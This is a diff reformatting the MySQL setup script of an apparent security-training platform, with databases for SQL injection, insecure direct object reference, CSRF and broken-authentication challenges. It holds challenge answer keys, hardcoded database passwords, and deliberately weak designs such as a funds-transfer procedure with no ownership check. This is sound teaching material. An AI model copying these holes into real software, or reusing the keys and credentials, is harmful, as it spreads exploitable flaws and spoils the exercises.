-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
 
-DROP SCHEMA IF EXISTS `directObjectBank`;
-CREATE SCHEMA IF NOT EXISTS `directObjectBank` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
-USE
-`directObjectBank` ;
+DROP SCHEMA IF EXISTS `directObjectBank` ;
+CREATE SCHEMA IF NOT EXISTS `directObjectBank` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;
+USE `directObjectBank` ;
 
 -- -----------------------------------------------------
 -- Table `directObjectBank`.`bankAccounts`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `directObjectBank`.`bankAccounts`
-(
-    `account_number`
-    INT
-    NOT
-    NULL
-    AUTO_INCREMENT,
-    `account_holder`
-    VARCHAR
-(
-    45
-) NOT NULL,
-    `account_password` VARCHAR
-(
-    191
-) NOT NULL,
-    `account_balance` FLOAT NOT NULL DEFAULT 5,
-    PRIMARY KEY
-(
-    `account_number`
-),
-    UNIQUE INDEX `account_holder_UNIQUE`
-(
-    `account_holder` ASC
-))
-    ENGINE = InnoDB;
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `directObjectBank`.`bankAccounts` (
+  `account_number` INT NOT NULL AUTO_INCREMENT,
+  `account_holder` VARCHAR(45) NOT NULL,
+  `account_password` VARCHAR(191) NOT NULL,
+  `account_balance` FLOAT NOT NULL DEFAULT 5,
+  PRIMARY KEY (`account_number`),
+  UNIQUE INDEX `account_holder_UNIQUE` (`account_holder` ASC))
+ENGINE = InnoDB;
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `directObjectBank`.`bankAccounts`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`directObjectBank`;
-INSERT INTO `directObjectBank`.`bankAccounts` (`account_number`, `account_holder`, `account_password`,
-                                               `account_balance`)
-VALUES (0, 'Mr. Banks', 'SignInImpossibleBecauseNotHashed', 10000000000);
+USE `directObjectBank`;
+INSERT INTO `directObjectBank`.`bankAccounts` (`account_number`, `account_holder`, `account_password`, `account_balance`) VALUES (0, 'Mr. Banks', 'SignInImpossibleBecauseNotHashed', 10000000000);
 
 COMMIT;
 
 -- BankAuth Procedure
-USE
-`directObjectBank`;
+USE `directObjectBank`;
 -- DELIMITER $$
-CREATE PROCEDURE `directObjectBank`.`bankAuth`(IN theUserId VARCHAR (45), thePass VARCHAR (191))
+CREATE PROCEDURE `directObjectBank`.`bankAuth` (IN theUserId VARCHAR(45), thePass VARCHAR(191))
 BEGIN
 COMMIT;
-SELECT account_number, account_holder
-FROM `directObjectBank`.`bankAccounts`
-WHERE account_holder = theUserId
-  AND account_password = SHA2(thePass, 256);
+SELECT account_number, account_holder FROM `directObjectBank`.`bankAccounts` WHERE account_holder = theUserId AND account_password = SHA2(thePass, 256);
 END
 ;
 -- $$
@@ -1917,15 +1077,12 @@ END
 -- DELIMITER ;
 
 -- CurrentFunds Procedure
-USE
-`directObjectBank`;
+USE `directObjectBank`;
 -- DELIMITER $$
-CREATE PROCEDURE `directObjectBank`.`currentFunds`(IN theBankAccountNumber VARCHAR (45))
+CREATE PROCEDURE `directObjectBank`.`currentFunds` (IN theBankAccountNumber VARCHAR(45))
 BEGIN
 COMMIT;
-SELECT account_balance
-FROM `directObjectBank`.`bankAccounts`
-WHERE account_number = theBankAccountNumber;
+SELECT account_balance FROM `directObjectBank`.`bankAccounts` WHERE account_number = theBankAccountNumber;
 END
 ;
 -- $$
@@ -1933,19 +1090,17 @@ END
 -- DELIMITER ;
 
 -- transferFunds Procedure
-USE
-`directObjectBank`;
+USE `directObjectBank`;
 -- DELIMITER $$
-CREATE PROCEDURE `directObjectBank`.`transferFunds`(IN theGiverAccountNumber VARCHAR (45),
-                                                    IN theRecieverAccountNumber VARCHAR (45), IN theAmmount FLOAT)
+CREATE PROCEDURE `directObjectBank`.`transferFunds` (IN theGiverAccountNumber VARCHAR(45), IN theRecieverAccountNumber VARCHAR(45), IN theAmmount FLOAT)
 BEGIN
 COMMIT;
 UPDATE `directObjectBank`.`bankAccounts`
-SET account_balance = account_balance - theAmmount
-WHERE account_number = theGiverAccountNumber;
+	SET account_balance = account_balance - theAmmount
+	WHERE account_number = theGiverAccountNumber;
 UPDATE `directObjectBank`.`bankAccounts`
-SET account_balance = account_balance + theAmmount
-WHERE account_number = theRecieverAccountNumber;
+	SET account_balance = account_balance + theAmmount
+	WHERE account_number = theRecieverAccountNumber;
 COMMIT;
 END
 ;
@@ -1954,14 +1109,12 @@ END
 -- DELIMITER ;
 
 -- createAccount Procedure
-USE
-`directObjectBank`;
+USE `directObjectBank`;
 -- DELIMITER $$
-CREATE PROCEDURE `directObjectBank`.`createAccount`(IN accountHolder VARCHAR (45), IN accountPassword VARCHAR (191))
+CREATE PROCEDURE `directObjectBank`.`createAccount` (IN accountHolder VARCHAR(45), IN accountPassword VARCHAR(191))
 BEGIN
 COMMIT;
-INSERT INTO `directObjectBank`.`bankAccounts` (`account_holder`, `account_password`, `account_balance`)
-VALUES (accountHolder, SHA2(accountPassword, 256), 0);
+INSERT INTO `directObjectBank`.`bankAccounts` (`account_holder`, `account_password`, `account_balance`) VALUES (accountHolder, SHA2(accountPassword, 256), 0);
 COMMIT;
 END
 ;
@@ -1975,77 +1128,48 @@ COMMIT;
 -- SQL Stored Proecure Challenge
 -- ======================================================
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
 
-DROP SCHEMA IF EXISTS `SqlChalStoredProc`;
-CREATE SCHEMA IF NOT EXISTS `SqlChalStoredProc` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`SqlChalStoredProc` ;
+DROP SCHEMA IF EXISTS `SqlChalStoredProc` ;
+CREATE SCHEMA IF NOT EXISTS `SqlChalStoredProc` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `SqlChalStoredProc` ;
 
 -- -----------------------------------------------------
 -- Table `SqlChalStoredProc`.`customers`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SqlChalStoredProc`.`customers`
-(
-    `customerId` VARCHAR
-(
-    64
-) NOT NULL ,
-    `customerName` VARCHAR
-(
-    32
-) NOT NULL ,
-    `customerAddress` VARCHAR
-(
-    128
-) NOT NULL ,
-    `comment` LONGTEXT NULL ,
-    PRIMARY KEY
-(
-    `customerId`
-) )
-    ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE  TABLE IF NOT EXISTS `SqlChalStoredProc`.`customers` (
+  `customerId` VARCHAR(64) NOT NULL ,
+  `customerName` VARCHAR(32) NOT NULL ,
+  `customerAddress` VARCHAR(128) NOT NULL ,
+  `comment` LONGTEXT NULL ,
+  PRIMARY KEY (`customerId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `SqlChalStoredProc`.`customers`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`SqlChalStoredProc`;
-INSERT INTO `SqlChalStoredProc`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('019ce129ee8960a6b875b20095705d53f8c7b0ca', 'John Fits', 'crazycat@example.com', NULL);
-INSERT INTO `SqlChalStoredProc`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('44e2bdc1059903f464e5ba9a34b927614d7fee55', 'Rita Hanolan', 'the1night2before3four@exampleEmails.com',
-        'Well Done! The Result key is d9c5757c1c086d02d491cbe46a941ecde5a65d523de36ac1bfed8dd4dd9994c8');
-INSERT INTO `SqlChalStoredProc`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('05159435826869ccfd76d77a2ed4ba7c2023f0cb', 'Rubix Man', 'manycolours@cube.com', NULL);
-INSERT INTO `SqlChalStoredProc`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('6c5c26a1deccf4a87059deb0a3fb463ff7d62fd5', 'Paul O Brien', 'sixshooter@deaf.com', NULL);
+USE `SqlChalStoredProc`;
+INSERT INTO `SqlChalStoredProc`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('019ce129ee8960a6b875b20095705d53f8c7b0ca', 'John Fits', 'crazycat@example.com', NULL);
+INSERT INTO `SqlChalStoredProc`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('44e2bdc1059903f464e5ba9a34b927614d7fee55', 'Rita Hanolan', 'the1night2before3four@exampleEmails.com', 'Well Done! The Result key is d9c5757c1c086d02d491cbe46a941ecde5a65d523de36ac1bfed8dd4dd9994c8');
+INSERT INTO `SqlChalStoredProc`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('05159435826869ccfd76d77a2ed4ba7c2023f0cb', 'Rubix Man', 'manycolours@cube.com', NULL);
+INSERT INTO `SqlChalStoredProc`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('6c5c26a1deccf4a87059deb0a3fb463ff7d62fd5', 'Paul O Brien', 'sixshooter@deaf.com', NULL);
 
 COMMIT;
 
 -- findUser Procedure
-USE
-`SqlChalStoredProc`;
+USE `SqlChalStoredProc`;
 -- DELIMITER $$
-CREATE PROCEDURE `SqlChalStoredProc`.`findUser`(IN theAddress VARCHAR (128))
+CREATE PROCEDURE `SqlChalStoredProc`.`findUser` (IN theAddress VARCHAR(128))
 BEGIN
 COMMIT;
-SELECT *
-FROM customers
-WHERE customerAddress = theAddress;
+SELECT * FROM customers WHERE customerAddress = theAddress;
 END
 ;
 -- $$
@@ -2060,64 +1184,38 @@ COMMIT;
 -- SQL Injection Poor Escaping (email)
 -- ======================================================
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
 
-DROP SCHEMA IF EXISTS `SqlPoorEscape`;
-CREATE SCHEMA IF NOT EXISTS `SqlPoorEscape` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`SqlPoorEscape` ;
+DROP SCHEMA IF EXISTS `SqlPoorEscape` ;
+CREATE SCHEMA IF NOT EXISTS `SqlPoorEscape` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `SqlPoorEscape` ;
 
 -- -----------------------------------------------------
 -- Table `SqlPoorEscape`.`customers`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SqlPoorEscape`.`customers`
-(
-    `customerId` VARCHAR
-(
-    64
-) NOT NULL ,
-    `customerName` VARCHAR
-(
-    32
-) NOT NULL ,
-    `customerAddress` VARCHAR
-(
-    35
-) NOT NULL ,
-    `comment` LONGTEXT NULL ,
-    PRIMARY KEY
-(
-    `customerId`
-) )
-    ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE  TABLE IF NOT EXISTS `SqlPoorEscape`.`customers` (
+  `customerId` VARCHAR(64) NOT NULL ,
+  `customerName` VARCHAR(32) NOT NULL ,
+  `customerAddress` VARCHAR(35) NOT NULL ,
+  `comment` LONGTEXT NULL ,
+  PRIMARY KEY (`customerId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `SqlPoorEscape`.`customers`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`SqlPoorEscape`;
-INSERT INTO `SqlPoorEscape`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('019h53d60a6b875b20095705d53f8c7b0ca', 'John Fits', 'thislifecouldbethelast@example.com', NULL);
-INSERT INTO `SqlPoorEscape`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('44e2bdc105ifdua464e5ba9a34b927614d7fee55', 'Rita Hanolan', 'dontfoolyourself@example.com',
-        'Well Done! The Result key is 0dcf9078ba5d878f9e23809ac8f013d1a08fdc8f12c5036f1a4746dbe86c0aac');
-INSERT INTO `SqlPoorEscape`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('051594asdjd6869ccfd76d77a2ed4ba7c2023f0cb', 'Rubix Man', 'dontkidyourself@cube.com', NULL);
-INSERT INTO `SqlPoorEscape`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('6c5c26adjdccf4a87059deb0a3fb463ff7d62fd5', 'Paul O Brien', 'andweretooyoungtosee@deaf.com', NULL);
+USE `SqlPoorEscape`;
+INSERT INTO `SqlPoorEscape`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('019h53d60a6b875b20095705d53f8c7b0ca', 'John Fits', 'thislifecouldbethelast@example.com', NULL);
+INSERT INTO `SqlPoorEscape`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('44e2bdc105ifdua464e5ba9a34b927614d7fee55', 'Rita Hanolan', 'dontfoolyourself@example.com', 'Well Done! The Result key is 0dcf9078ba5d878f9e23809ac8f013d1a08fdc8f12c5036f1a4746dbe86c0aac');
+INSERT INTO `SqlPoorEscape`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('051594asdjd6869ccfd76d77a2ed4ba7c2023f0cb', 'Rubix Man', 'dontkidyourself@cube.com', NULL);
+INSERT INTO `SqlPoorEscape`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('6c5c26adjdccf4a87059deb0a3fb463ff7d62fd5', 'Paul O Brien', 'andweretooyoungtosee@deaf.com', NULL);
 
 COMMIT;
 
@@ -2129,480 +1227,155 @@ COMMIT;
 -- -----------------------------------------------------
 
 
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 commit;
 
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'userLookUuuup'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'userLookUuuup'@'localhost';
-CREATE
-USER 'userLookUuuup'@'localhost' IDENTIFIED BY 'youMomaSoTh1n';
-GRANT
-SELECT
-ON `SqlChalSix`.`users` TO 'userLookUuuup'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'DnTPubUser'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'DnTPubUser'@'localhost';
-CREATE
-USER 'DnTPubUser'@'localhost' IDENTIFIED BY 'ch3fBrownSa4useIsS00000Go0d';
-GRANT
-SELECT
-ON `SQLiC5Shop`.`items` TO 'DnTPubUser'@'localhost';
-GRANT
-SELECT
-ON `SQLiC5Shop`.`coupons` TO 'DnTPubUser'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'DnTVipUser'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'DnTVipUser'@'localhost';
-CREATE
-USER 'DnTVipUser'@'localhost' IDENTIFIED BY 'ch3fBrownSa4useIsS00000Go0d';
-GRANT
-SELECT
-ON `SQLiC5Shop`.`items` TO 'DnTVipUser'@'localhost';
-GRANT
-SELECT
-ON `SQLiC5Shop`.`vipCoupons` TO 'DnTVipUser'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'DnTPurUser'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'DnTPurUser'@'localhost';
-CREATE
-USER 'DnTPurUser'@'localhost' IDENTIFIED BY 'ch3fBrownSa4useIsS00000Go0d';
-GRANT
-SELECT
-ON `SQLiC5Shop`.`items` TO 'DnTPurUser'@'localhost';
-GRANT
-SELECT
-ON `SQLiC5Shop`.`coupons` TO 'DnTPurUser'@'localhost';
-GRANT
-SELECT
-ON `SQLiC5Shop`.`vipCoupons` TO 'DnTPurUser'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'firstBloodyMessL'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'firstBloodyMessL'@'localhost';
-CREATE
-USER 'firstBloodyMessL'@'localhost' IDENTIFIED BY 'firstBlooded';
-GRANT
-SELECT
-ON `SqlInjLesson`.`tb_users` TO 'firstBloodyMessL'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'CharlieSeabrook'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'CharlieSeabrook'@'localhost';
-CREATE
-USER 'CharlieSeabrook'@'localhost' IDENTIFIED BY 'shallowHal';
-GRANT
-SELECT
-ON `SqlChalEmail`.`customers` TO 'CharlieSeabrook'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'RightGuard3d'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'RightGuard3d'@'localhost';
-CREATE
-USER 'RightGuard3d'@'localhost' IDENTIFIED BY 'logic3Speaker';
-GRANT
-SELECT
-ON `SqlChalOne`.`customers` TO 'RightGuard3d'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'HdmiNoSignal'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'HdmiNoSignal'@'localhost';
-CREATE
-USER 'HdmiNoSignal'@'localhost' IDENTIFIED BY '1nforma1ion';
-GRANT
-SELECT
-ON `SqlChalThree`.`customers` TO 'HdmiNoSignal'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'randomUserName'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER  'randomUserName'@'localhost';
-CREATE
-USER 'randomUserName'@'localhost' IDENTIFIED BY 'c4utionHoT';
-GRANT
-SELECT
-ON `BrokenAuthAndSessMangChalTwo`.`users` TO 'randomUserName'@'localhost';
-GRANT
-UPDATE ON `BrokenAuthAndSessMangChalTwo`.`users` TO 'randomUserName'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'doveM3nCare'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER  'doveM3nCare'@'localhost';
-CREATE
-USER 'doveM3nCare'@'localhost' IDENTIFIED BY 'plusm0r3';
-GRANT
-SELECT
-ON `BrokenAuthAndSessMangChalThree`.`users` TO 'doveM3nCare'@'localhost';
-GRANT
-UPDATE ON `BrokenAuthAndSessMangChalThree`.`users` TO 'doveM3nCare'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'murr4yFe1ld'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'murr4yFe1ld'@'localhost';
-CREATE
-USER  'murr4yFe1ld'@'localhost' IDENTIFIED BY '4gainst3ngl4nd';
-GRANT
-SELECT
-ON `directObjectRefChalOne`.`users` TO 'murr4yFe1ld'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'d3nn1sM4nely'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'd3nn1sM4nely'@'localhost';
-CREATE
-USER  'd3nn1sM4nely'@'localhost' IDENTIFIED BY 'Pr0ductM4rket1ngIssu3s';
-GRANT
-SELECT
-ON `directObjectRefChalTwo`.`users` TO 'd3nn1sM4nely'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'secureDood'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'secureDood'@'localhost';
-CREATE
-USER  'secureDood'@'localhost' IDENTIFIED BY 'iCantEv3n';
-GRANT
-SELECT
-ON `SqlChalFourSuperSecure`.`users` TO 'secureDood'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'csrfChalEnuer'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'csrfChalEnuer'@'localhost';
-CREATE
-USER  'csrfChalEnuer'@'localhost' IDENTIFIED BY 'c4n1bUplZ';
-GRANT
-SELECT
-ON `csrfChallengeEnumTokens`.`csrfTokens` TO 'csrfChalEnuer'@'localhost';
-GRANT
-INSERT
-ON
-`csrfChallengeEnumTokens`
-.
-`csrfTokens`
-TO
-'csrfChalEnuer'@'localhost';
-GRANT
-UPDATE ON `csrfChallengeEnumTokens`.`csrfTokens` TO 'csrfChalEnuer'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'l3tsg0cra'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER  'l3tsg0cra'@'localhost';
-CREATE
-USER 'l3tsg0cra'@'localhost' IDENTIFIED BY '83ururMa';
-GRANT
-SELECT
-ON `BrokenAuthAndSessMangChalFive`.`users` TO 'l3tsg0cra'@'localhost';
-GRANT
-UPDATE ON `BrokenAuthAndSessMangChalFive`.`users` TO 'l3tsg0cra'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'csrfChalFour'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'csrfChalFour'@'localhost';
-CREATE
-USER  'csrfChalFour'@'localhost' IDENTIFIED BY 'R1n13U2pv';
-GRANT
-SELECT
-ON `csrfChallengeFour`.`csrfTokens` TO 'csrfChalFour'@'localhost';
-GRANT
-INSERT
-ON
-`csrfChallengeFour`
-.
-`csrfTokens`
-TO
-'csrfChalFour'@'localhost';
-GRANT
-UPDATE ON `csrfChallengeFour`.`csrfTokens` TO 'csrfChalFour'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'randomMoFoName'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER  'randomMoFoName'@'localhost';
-CREATE
-USER 'randomMoFoName'@'localhost' IDENTIFIED BY 'c2zXlq_ZoT';
-GRANT
-SELECT
-ON `BrokenAuthAndSessMangChalSix`.`users` TO 'randomMoFoName'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'randomFlower'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER  'randomFlower'@'localhost';
-CREATE
-USER 'randomFlower'@'localhost' IDENTIFIED BY 'c21-le_6oT';
-GRANT
-SELECT
-ON `BrokenAuthAndSessMangChalSeven`.`users` TO 'randomFlower'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'tSwsfUSer'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'tSwsfUSer'@'localhost';
-CREATE
-USER 'tSwsfUSer'@'localhost' IDENTIFIED BY '9s31iusd-n';
-GRANT
-SELECT
-ON `CryptShop`.`items` TO 'tSwsfUSer'@'localhost';
-GRANT
-SELECT
-ON `CryptShop`.`coupons` TO 'tSwsfUSer'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'yourOrEll'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER  'yourOrEll'@'localhost';
-CREATE
-USER 'yourOrEll'@'localhost' IDENTIFIED BY '91dj3:766f';
-GRANT
-SELECT
-ON `UrlAccessThree`.`users` TO 'yourOrEll'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'r1ndomFlower'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER  'r1ndomFlower'@'localhost';
-CREATE
-USER 'r1ndomFlower'@'localhost' IDENTIFIED BY 'c41-l2_6oT';
-GRANT
-SELECT
-ON `sqlInjectSeven`.`users` TO 'r1ndomFlower'@'localhost';
-
-GRANT
-USAGE
-ON
-*
-.
-*
-TO
-'al1th3Tokens'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER  'al1th3Tokens'@'localhost';
-CREATE
-USER 'al1th3Tokens'@'localhost' IDENTIFIED BY '87SDO63yUN.';
-GRANT
-SELECT
-ON `securityMisconfigStealToken`.`tokens` TO 'al1th3Tokens'@'localhost';
-GRANT
-INSERT
-ON
-`securityMisconfigStealToken`
-.
-`tokens`
-TO
-'al1th3Tokens'@'localhost';
-GRANT EXECUTE ON PROCEDURE `securityMisconfigStealToken`.`getToken` TO
-'al1th3Tokens'@'localhost';
-GRANT EXECUTE ON PROCEDURE `securityMisconfigStealToken`.`validToken`  TO
-'al1th3Tokens'@'localhost';
-
-GRANT USAGE ON *.* TO
-'theBankMan'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'theBankMan'@'localhost';
-CREATE
-USER 'theBankMan'@'localhost' IDENTIFIED BY 'B4ndkm.M98n';
-GRANT
-SELECT
-ON `directObjectBank`.`bankAccounts` TO 'theBankMan'@'localhost';
-GRANT
-INSERT
-ON
-`directObjectBank`
-.
-`bankAccounts`
-TO
-'theBankMan'@'localhost';
-GRANT
-UPDATE ON `directObjectBank`.`bankAccounts` TO 'theBankMan'@'localhost';
-GRANT
-EXECUTE
-ON
-PROCEDURE
-`directObjectBank`
-.
-`bankAuth`
-TO
-'theBankMan'@'localhost';
-GRANT EXECUTE ON PROCEDURE `directObjectBank`.`currentFunds` TO
-'theBankMan'@'localhost';
-GRANT EXECUTE ON PROCEDURE `directObjectBank`.`transferFunds` TO
-'theBankMan'@'localhost';
-GRANT EXECUTE ON PROCEDURE `directObjectBank`.`createAccount` TO
-'theBankMan'@'localhost';
-
-GRANT USAGE ON *.* TO
-'procChalUser'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'procChalUser'@'localhost';
-CREATE
-USER 'procChalUser'@'localhost' IDENTIFIED BY 'k61dSmsM*8n';
-GRANT
-SELECT
-ON `SqlChalStoredProc`.`customers` TO 'procChalUser'@'localhost';
-GRANT
-EXECUTE
-ON
-PROCEDURE
-`SqlChalStoredProc`
-.
-`findUser`
-TO
-'procChalUser'@'localhost';
-
-GRANT USAGE ON *.* TO
-'imVideoingThis'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'imVideoingThis'@'localhost';
-CREATE
-USER 'imVideoingThis'@'localhost' IDENTIFIED BY 'auoi@7723dj';
-GRANT
-SELECT
-ON `SqlPoorEscape`.`customers` TO 'imVideoingThis'@'localhost';
+GRANT USAGE ON *.* TO 'userLookUuuup'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'userLookUuuup'@'localhost';
+CREATE USER 'userLookUuuup'@'localhost' IDENTIFIED BY 'youMomaSoTh1n';
+GRANT SELECT ON `SqlChalSix`.`users`  TO 'userLookUuuup'@'localhost';
+
+GRANT USAGE ON *.* TO 'DnTPubUser'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'DnTPubUser'@'localhost';
+CREATE USER 'DnTPubUser'@'localhost' IDENTIFIED BY 'ch3fBrownSa4useIsS00000Go0d';
+GRANT SELECT ON `SQLiC5Shop`.`items` TO 'DnTPubUser'@'localhost';
+GRANT SELECT ON `SQLiC5Shop`.`coupons` TO 'DnTPubUser'@'localhost';
+
+GRANT USAGE ON *.* TO 'DnTVipUser'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'DnTVipUser'@'localhost';
+CREATE USER 'DnTVipUser'@'localhost' IDENTIFIED BY 'ch3fBrownSa4useIsS00000Go0d';
+GRANT SELECT ON `SQLiC5Shop`.`items` TO 'DnTVipUser'@'localhost';
